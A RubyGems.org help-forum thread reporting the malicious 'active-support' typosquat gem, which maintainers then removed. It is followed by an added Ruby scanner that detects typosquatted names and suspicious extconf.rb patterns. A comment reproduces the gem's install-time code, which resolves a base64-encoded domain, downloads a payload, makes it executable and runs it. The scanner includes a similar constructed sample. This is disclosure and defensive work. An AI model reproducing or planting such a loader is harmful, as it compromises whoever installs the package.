RubyGems.org: Discussion (tag:help.rubygems.org,2010-01-19:/discussions/problems/32656-reporting-abuse-on-active-support), 2018-08-09T13:10:57Z
Reporting Abuse on active-support

Comment/45866493, 2018-08-09T02:15:12Z, 2018-08-09T02:15:13Z
<div><p>Further investigation shows definite malware behaviour.</p>
<p>The gem duplicates the official activesupport (no hyphen) code but adds a compiled extension.</p>
<p>active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb<br>
attempts to resolve a base64-encoded domain, download a payload and execute it.</p>
<p>require 'net/http'<br>
require 'uri'<br>
require 'base64'<br>
require 'resolv'</p>
<p>class Smectis<br>
  def self.install_explot(weighership)<br>
    if !weighership.nil? and weighership != '0.0.0.0'<br>
      educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))<br>
      File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|<br>
        uterometer.binmode<br>
        uterometer.write(educable.body)<br>
        uterometer.chmod(0777)<br>
        uterometer.close<br>
      end<br>
      system('/tmp/autosymbiontic')<br>
    end<br>
  end</p>
<p>  def self.run()<br>
    milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='<br>
    jaunting = nil<br>
    begin<br>
      jaunting = Resolv.getaddress(Base64.decode64(milligram))<br>
    rescue<br>
    end<br>
    self.install_exploit(jaunting)<br>
  end<br>
end</p>
<p>Smectis.run()</p></div>
Sam Giffney

Comment, 2018-08-09T12:15:46Z, 2018-08-09T12:15:48Z
<div><p>Probably the same thing with this gem from the same user: <a href="https://rubygems.org/gems/deamons">https://rubygems.org/gems/deamons</a></p></div>
Patrick Figel

Comment, 2018-08-09T13:10:56Z
<div><p>Thanks for the report. We have removed the gem.</p></div>
David Radcliffe
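
The two signals in this thread (a gem name that differs from a well-known one only by a hyphen or a swapped letter, and an extconf.rb that resolves an encoded host, downloads a file and runs it) can be checked statically before install. This is an added example, not part of the original discussion and not RubyGems.org tooling; the rule names, the PROTECTED list and the sample strings are assumptions constructed for illustration.

```ruby
# Added example. Rule names and the PROTECTED list are assumptions.
PROTECTED = %w[activesupport daemons].freeze # names worth guarding (assumed list)

# Returns the protected name that `name` imitates, or nil.
def squats(name)
  key = name.downcase.delete('-_')
  PROTECTED.find do |real|
    next false if name == real
    swapped = key.chars.sort == real.chars.sort &&
              key.chars.zip(real.chars).count { |a, b| a != b } == 2
    key == real || swapped # separator variant, or two letters transposed
  end
end

# Patterns for the behaviours the report describes in extconf.rb (runs at install time).
RULES = {
  network_require: %r{^\s*require\s+['"](net/http|open-uri|socket|resolv)['"]},
  base64_decode:   /Base64\.(strict_)?decode64/,
  dns_lookup:      /Resolv\.getaddress/,
  http_fetch:      /Net::HTTP\.(get_response|get|start)\b/,
  tmp_write:       %r{File\.(open|write)\(\s*['"]/tmp/},
  make_executable: /\.chmod\(/,
  run_process:     /\b(system|exec|spawn)\s*\(/
}.freeze

def scan_extconf(source)
  RULES.select { |_, rx| source.match?(rx) }.keys
end

# One hit is weak (many build scripts shell out); fetching plus executing is the red flag.
def download_and_execute?(hits)
  (hits & %i[network_require http_fetch]).any? && hits.include?(:run_process)
end

# Constructed sample with placeholder host and path, modelled on the quoted snippet.
SAMPLE = <<~'RUBY'
  require 'net/http'
  require 'resolv'
  host = Resolv.getaddress(Base64.decode64('ZXhhbXBsZS5pbnZhbGlk'))
  body = Net::HTTP.get_response(URI('http://' + host + '/x')).body
  File.open('/tmp/placeholder', 'wb+') { |f| f.write(body); f.chmod(0777) }
  system('/tmp/placeholder')
RUBY
BENIGN = "require 'mkmf'\ncreate_makefile('example/example')\n" # constructed

if __FILE__ == $PROGRAM_NAME
  %w[active-support deamons activesupport].each { |n| puts "#{n}: imitates #{squats(n).inspect}" }
  puts "sample hits: #{scan_extconf(SAMPLE).inspect}"
end
```

Run it against the `extconf.rb` files of an unpacked `.gem` (for example after `gem unpack`) rather than after installation, since the extension script executes during `gem install`.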